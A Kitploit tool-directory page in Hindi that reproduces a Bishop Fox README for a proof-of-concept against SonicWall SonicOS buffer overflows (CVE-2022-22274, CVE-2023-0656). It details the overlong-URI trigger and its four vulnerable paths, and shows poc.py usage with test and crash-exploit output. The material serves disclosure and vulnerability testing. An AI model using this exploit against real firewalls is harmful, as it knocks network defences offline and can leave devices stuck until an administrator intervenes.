Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22274_CVE-2023-0656 — SonicWall SonicOS स्टैक-आधारित बफर ओवरफ्लो (CVE-2022-22274, CVE-2023-0656) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से कमजोर फायरवॉल के सुरक्षित परीक्षण या क्रैश शोषण को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/bishopfox/cve-2022-22274_cve-2023-0656
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubbishopfox/cve-2022-22274_cve-2023-0656

CVE-2022-22274_CVE-2023-0656

SonicWall SonicOS स्टैक-आधारित बफर ओवरफ्लो (CVE-2022-22274, CVE-2023-0656) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से कमजोर फायरवॉल के सुरक्षित परीक्षण या क्रैश शोषण को सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1952 साल पहलेअभी तक समीक्षित नहीं

SonicWall NGFW CVE-2022-22274 और CVE-2023-0656

उदाहरण gif

24 मार्च, 2022 को, SonicWall ने निम्नलिखित विवरणों के साथ एक सलाहकार जारी किया:

SonicOS में HTTP अनुरोध के माध्यम से एक स्टैक-आधारित बफर ओवरफ्लो भेद्यता एक दूरस्थ अप्रमाणित हमलावर को सेवा अस्वीकार (DoS) उत्पन्न करने या संभावित रूप से फ़ायरवॉल में कोड निष्पादन करने की अनुमति देती है।

नोट: यह भेद्यता केवल "वेब प्रबंधन" इंटरफ़ेस को प्रभावित करती है, SonicOS SSLVPN इंटरफ़ेस प्रभावित नहीं होता है।

2 मार्च, 2023 को, SonicWall ने एक और समान सलाहकार जारी किया:

SonicOS में एक स्टैक-आधारित बफर ओवरफ्लो भेद्यता एक दूरस्थ अप्रमाणित हमलावर को सेवा अस्वीकार (DoS) उत्पन्न करने की अनुमति देती है, जिसके कारण प्रभावित फ़ायरवॉल क्रैश हो सकता है।

नोट: यह भेद्यता केवल "वेब प्रबंधन" इंटरफ़ेस को प्रभावित करती है, SonicOS SSLVPN इंटरफ़ेस प्रभावित नहीं होता है।

दोनों समस्याएं एक ही कमजोर कोड पैटर्न से संबंधित हैं और एक ही शोषण पेलोड का उपयोग करती हैं, लेकिन विभिन्न URI पथों पर ट्रिगर होती हैं।

विवरण

बफर ओवरफ्लो 1024 वर्णों से अधिक लंबे URI पथ वाले HTTP अनुरोध के माध्यम से ट्रिगर होता है। CVE-2022-22274 का शोषण /resources/ पर या उन्नत खतरा संरक्षण URI पथ (/atp/ यदि सक्षम हो या // यदि अक्षम हो) पर किया जा सकता है। CVE-2023-0656 का शोषण /stats/ या /Security_Services पर किया जा सकता है।

इस रिपॉजिटरी में सभी चार URI पथों पर एक लक्ष्य की शोषणक्षमता के लिए परीक्षण करने हेतु एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है। यह डिफ़ॉल्ट रूप से एक सुरक्षित परीक्षण करता है, लेकिन बग्स का शोषण करने और लक्ष्य को क्रैश करने की क्षमता भी रखता है।

नोट: अपनी डिफ़ॉल्ट कॉन्फ़िगरेशन में, थोड़े समय के भीतर लगातार 3 क्रैश होने पर SonicOS डिवाइस को डीबग मोड में रीबूट कर देगा और जब तक कोई व्यवस्थापक इसे वापस ऑनलाइन नहीं लाता, तब तक यह अप्राप्य रहेगा। जिम्मेदारी से उपयोग करें!

उपयोग

Python 3 स्थापित करें और python -m pip install -y argparse चलाएँ।

root@kitploit:~
usage: poc.py [-h] [-t] [-x {1,2,3,4,5}] [-s] target

positional arguments:
  target                hostname[:port] (port defaults to 443)

options:
  -h, --help            show this help message and exit
  -t, --test            safely test for vulnerability (default action)
  -x {1,2,3,4,5}, --exploit {1,2,3,4,5}
                        exploit the target (trigger a crash). 1=/resources/ 2=// 3=/atp/ 4=/stats/ 5=/Security_Services
  -s, --skip-header-check
                        skip initial check for SonicWALL response header

उदाहरण

Test a vulnerable target:

root@kitploit:~
$ ./poc.py 192.168.50.29
[*] Checking https://192.168.50.29:443
[+] Confirmed target is running SonicOS
[*] Testing CVE-2022-22274 at /resources/
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2022-22274 at //
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2022-22274 at /atp/
[-] Target does not appear to be affected (HTTP 404)
[*] Testing CVE-2023-0656 at /stats/
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2023-0656 at /Security_Services
[+] Target looks vulnerable! (redirected)

Exploit a vulnerable target:

root@kitploit:~
$ ./poc.py -x 1 192.168.50.29
[*] Checking https://192.168.50.29:443
[+] Confirmed target is running SonicOS
[*] Triggering exploit at /resources/
[+] Exploit succeeded! (target unavailable)

Test and exploit a patched target:

root@kitploit:~
$ ./poc.py -tx 4 192.168.50.31
[*] Checking https://192.168.50.31:443
[+] Confirmed target is running SonicOS
[*] Testing CVE-2022-22274 at /resources/
[-] Target appears to be patched (empty response)
[*] Testing CVE-2022-22274 at //
[-] Target appears to be patched (empty response)
[*] Testing CVE-2022-22274 at /atp/
[-] Target does not appear to be affected (HTTP 404)
[*] Testing CVE-2023-0656 at /stats/
[-] Target appears to be patched (empty response)
[*] Testing CVE-2023-0656 at /Security_Services
[-] Target appears to be patched (empty response)
[*] Triggering exploit at /stats/
[-] Exploit failed (target responded)

लाइसेंस

यह प्रोजेक्ट GNU GPL 3.0 लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।

टूल डाउनलोड करें